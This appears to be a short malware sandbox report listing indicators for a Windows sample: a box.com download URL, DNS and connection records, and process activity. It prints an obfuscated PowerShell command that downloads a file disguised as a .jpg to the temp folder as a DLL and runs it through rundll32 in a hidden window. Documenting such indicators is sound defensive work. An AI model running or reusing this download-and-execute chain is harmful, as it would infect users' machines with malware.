Technical Information
- https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg as %temp%\bsrzjsmvnqzl_user_yukig.dll
- 'lu######uimyuri777.box.com':443
- DNS ASK lu######uimyuri777.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-ObjecT sysTem.neT.webcLienT).dOwnLOadFiLe('""https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg','%TEMP%\bsrzjsmvnqzl_user_yukig.dLL');sTaRT-pROcess Rund...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\bsrzjsmvnqzl_user_yukig.dLL starter